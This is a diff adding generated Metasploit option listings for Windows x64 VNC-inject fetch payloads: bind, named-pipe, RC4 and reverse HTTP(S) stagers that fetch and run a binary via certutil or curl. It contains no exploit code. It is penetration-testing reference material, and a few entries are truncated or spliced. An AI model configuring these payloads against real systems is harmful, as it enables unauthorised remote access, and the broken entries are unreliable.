in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp.txt new file mode 100644 index 0000000..edb32bd --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp.txt 
@@ -0,0 +1,78 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager + Module: payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 129 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME htamxvybZmX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Listen for an IPv6 connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between 
pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp_uuid.txt new file mode 100644 index 0000000..b0db81e --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_ipv6_tcp_uuid.txt 
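Review bot: the Name field in the vncinject/bind_ipv6_tcp dump ("HTTP Fetch, Windows x64 IPv6 Bind TCP Stager") does not mention VNC at all, unlike the shell dumps whose names carry "Command Shell", so anyone grepping these files by name will not find the VNC variants; that text comes from the module metadata, so the fix belongs upstream rather than in these generated files. The same applies to the DisableSessionTracking description ("as users log in an out of the input desktop", should be "in and out"), which recurs in every vncinject dump in this patch; please do not hand-edit the generated output, since the next regeneration would reintroduce it.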
@@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Windows x64 IPv6 Bind TCP Stager with UUID Support + Module: payload/cmd/windows/http/x64/vncinject/bind_ipv6_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME TUrybFlJiedY no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Listen for an IPv6 connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to 
sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_named_pipe.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_named_pipe.txt new file mode 100644 index 0000000..c664de7 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_named_pipe.txt 
@@ -0,0 +1,85 @@ + + Name: HTTP Fetch, Windows x64 Bind Named Pipe Stager + Module: payload/cmd/windows/http/x64/vncinject/bind_named_pipe + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 123 + Rank: Normal + +Provided by: + Brendan Watters + sf + UserExistsError + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME uTGlynUV no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 445 yes SMB port +PIPENAME msf-pipe yes Name of the pipe to connect to +RHOST no Host of the pipe to connect to +SMBDomain . no The Windows domain to use for authentication +SMBPass no The password for the specified username +SMBUser no The username to authenticate as +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Listen for a pipe connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between 
pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + SMBDirect true yes The target port is a raw SMB service (not NetBIOS) + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WAIT_TIMEOUT 10 no Seconds pipe will wait for a connection + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp.txt new file mode 100644 index 0000000..39eb497 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp.txt 
@@ -0,0 +1,78 @@ + + Name: HTTP Fetch, Windows x64 Bind TCP Stager + Module: payload/cmd/windows/http/x64/vncinject/bind_tcp + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + sf + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME lTqNNKuvH no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Listen for a connection (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks 
+ PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_rc4.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_rc4.txt new file mode 100644 index 0000000..e9eaf98 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_rc4.txt 
@@ -0,0 +1,84 @@ + + Name: HTTP Fetch, Bind TCP Stager (RC4 Stage Encryption, Metasm) + Module: payload/cmd/windows/http/x64/vncinject/bind_tcp_rc4 + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 131 + Rank: Normal + +Provided by: + Brendan Watters + sf + hdm + skape + mihi + max3raza + RageLtMan + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME BJBqCfWHhBIA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RC4PASSWORD msf yes Password to derive RC4 key from +RHOST no The target address +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + 
PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_uuid.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_uuid.txt new file mode 100644 index 0000000..b2ebc60 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-bind_tcp_uuid.txt 
@@ -0,0 +1,79 @@ + + Name: HTTP Fetch, Bind TCP Stager with UUID Support (Windows x64) + Module: payload/cmd/windows/http/x64/vncinject/bind_tcp_uuid + Platform: Windows + Arch: cmd +Needs Admin: No + Total size: 125 + Rank: Normal + +Provided by: + Brendan Watters + sf + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME GiDjTwViA no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LPORT 4444 yes The listen port +RHOST no The target address +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Listen for a connection with UUID Support (Windows x64) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep 
between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_http.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_http.txt new file mode 100644 index 0000000..e374d00 --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_http.txt 
@@ -0,0 +1,102 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/vncinject/reverse_http + Platform: Windows + Arch: cmd +Needs Admin: No + Total +Evasion options for payload/cmd/windows/http/x64/vncinject/reverse_http: +========================= + +.com> + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME DDEePhIid no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8080 yes The local listener port +LURI no The HTTP Path +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + +Description: + Fetch and execute an x64 payload from an HTTP server. 
+ Tunnel communication over HTTP (Windows x64 wininet) + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + DisableSessionTracking false no Disables the VNC payload from following the active session as users log in an out of the input desktop + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HttpCookie no An optional value to use for the Cookie HTTP header + HttpHostHeader no An optional value to use for the Host HTTP header + HttpProxyHost no An optional proxy server IP address or hostname + HttpProxyPass no An optional proxy server password Max parameter length: 63 characters + HttpProxyPort no An optional proxy server port + HttpProxyType HTTP yes The type of HTTP proxy (Accepted: HTTP, SOCKS) + HttpProxyUser no An optional proxy server username Max parameter length: 63 characters + HttpReferer no An optional value to use for the Referer HTTP header + HttpServerName Apache no The server header that the handler will send in response to requests + HttpUnknownRequestResponse

It works!

no The returned HTML response body when the handler receives a request that is not from a payload + HttpUserAgent Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36 no The user-agent that the payload should use for communication Max parameter length: 255 characters + IgnoreUnknownPayloads false no Whether to drop connections from payloads using unknown UUIDs + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + OverrideLHOST no When OverrideRequestHost is set, use this value as the host name for secondary requests + OverrideLPORT no When OverrideRequestHost is set, use this value as the port number for secondary requests + OverrideRequestHost false no Forces a specific host and port instead of using what the client requests, defaults to LHOST:LPORT + OverrideScheme no When OverrideRequestHost is set, use this value as the scheme for secondary requests, e.g http or https + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependMigrate false yes Spawns and runs shellcode in new process + PrependMigrateProc no Process to spawn and run shellcode in + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. 
Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + StagerURILength no The URI length for the stager (at least 5 bytes) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_https.txt b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_https.txt new file mode 100644 index 0000000..500bf9b --- /dev/null +++ b/msfvenom/payload_options/cmd-windows-http-x64-vncinject-reverse_https.txt 
@@ -0,0 +1,107 @@ + + Name: HTTP Fetch, Windows x64 Reverse HTTP Stager (wininet) + Module: payload/cmd/windows/http/x64/vncinject/reverse_https + Platform: Windows + Arch: cmd +Needs Admin: No + Total s +Evasion options for payload/cmd/windows/http/x64/vncinject/reverse_https: +========================= + +om> + hdm + agix + rwincey + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +AUTOVNC true yes Automatically launch VNC viewer if present +DisableCourtesyShell true no Disables the Metasploit Courtesy shell +EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) +FETCH_COMMAND CERTUTIL yes Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILENAME UdFOFThcK no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FETCH_WRITABLE_DIR %TEMP% yes Remote writable dir to store payload; cannot contain spaces. +LHOST yes The local listener hostname +LPORT 8443 yes The local listener port +LURI no The HTTP Path +VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy +VNCPORT 5900 yes The local port to use for the VNC proxy +ViewOnly true no Runs the viewer in view mode + + +When FETCH_COMMAND is one of CURL: + +Name Current Setting Required Description +---- --------------- 